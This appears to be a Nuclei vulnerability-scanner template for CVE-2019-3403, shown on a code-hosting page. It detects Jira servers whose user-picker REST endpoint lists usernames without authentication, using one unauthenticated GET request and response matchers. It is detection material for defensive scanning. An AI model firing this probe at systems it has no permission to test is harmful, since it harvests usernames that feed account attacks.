-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2019-3403.yaml
38 lines (32 loc) · 1014 Bytes
/
CVE-2019-3403.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
id: CVE-2019-3403
info:
name: User enumeration via an incorrect authorisation check
author: Ganofins
severity: medium
description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
reference: https://jira.atlassian.com/browse/JRASERVER-69242
tags: cve,cve2019,atlassian,jira
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2019-3403
cwe-id: CWE-863
requests:
- method: GET
path:
- "{{BaseURL}}/rest/api/2/user/picker?query="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'application/json'
part: header
- type: word
words:
- users
- total
- header
condition: and